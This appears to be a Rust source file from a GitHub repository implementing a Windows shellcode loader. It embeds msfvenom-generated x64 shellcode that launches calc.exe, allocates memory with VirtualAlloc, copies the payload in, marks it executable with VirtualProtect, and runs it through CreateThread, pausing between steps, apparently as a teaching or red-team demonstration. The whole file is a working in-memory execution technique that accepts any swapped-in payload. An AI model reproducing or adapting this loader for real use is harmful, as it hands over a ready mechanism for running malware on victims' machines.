-
Notifications
You must be signed in to change notification settings - Fork 1
/
main.rs
138 lines (108 loc) · 4.62 KB
/
main.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
use winapi::um::winnt::{PVOID, PROCESS_ALL_ACCESS,MEM_COMMIT,MEM_RESERVE,PAGE_EXECUTE_READWRITE, PAGE_READWRITE, PAGE_EXECUTE_READ};
use std::ptr;
use std::io;
use std::io::prelude::*;
use std::io::{stdin, stdout, Read, Write};
use winapi::um::errhandlingapi;
use winapi::um::processthreadsapi;
use winapi::um::winbase;
use winapi::um::synchapi::WaitForSingleObject;
use std::process;
type DWORD = u32;
fn breakpoint() {
let mut stdout = stdout();
stdout.write(b"[*] Press Enter to continue...\n").unwrap();
stdout.flush().unwrap();
stdin().read(&mut [0]).unwrap();
}
fn main(){
create_thread()
}
fn create_thread() {
//┌──(kali㉿kali)-[~/Desktop]
//└─$ msfvenom -p windows/x64/exec CMD="calc.exe" -f csharp
let test : [u8;276] =
[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00];
// allocate base addr as RW
unsafe{
let base_addr = kernel32::VirtualAlloc(
ptr::null_mut(),
test.len().try_into().unwrap(),
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE
);
if base_addr.is_null() {
println!("[-] Couldn't allocate memory to current proc.")
} else {
println!("[+] Allocated memory to current proc.");
}
breakpoint();
// copy shellcode into mem
println!("[*] Copying Shellcode to address in current proc.");
breakpoint();
std::ptr::copy(test.as_ptr() as _, base_addr, test.len());
println!("[*] Copied...");
breakpoint();
// Flip mem protections from RW to RX with VirtualProtect. Dispose of the call with `out _`
println!("[*] Changing mem protections to RX...");
let mut old_protect: DWORD = PAGE_READWRITE;
let mem_protect = kernel32::VirtualProtect (
base_addr,
test.len() as u64,
PAGE_EXECUTE_READ,
&mut old_protect
);
if mem_protect == 0 {
let error = errhandlingapi::GetLastError();
println!("[-] Error: {}", error.to_string());
process::exit(0x0100);
}
breakpoint();
// Call CreateThread
println!("[*] Calling CreateThread...");
let mut tid = 0;
let ep: extern "system" fn(PVOID) -> u32 = { std::mem::transmute(base_addr) };
let h_thread = processthreadsapi::CreateThread(
ptr::null_mut(),
0,
Some(ep),
ptr::null_mut(),
0,
&mut tid
);
if h_thread.is_null() {
let error = unsafe { errhandlingapi::GetLastError() };
println!("{}", error.to_string())
} else {
println!("[+] Thread Id: {}", tid)
}
// CreateThread is not a blocking call, so we wait on the thread indefinitely with WaitForSingleObject. This blocks for as long as the thread is running
breakpoint();
println!("[*] Calling WaitForSingleObject...");
let status = WaitForSingleObject(h_thread, winbase::INFINITE);
if status == 0 {
println!("[+] Good!")
} else {
let error = errhandlingapi::GetLastError();
println!("{}", error.to_string())
}
}
}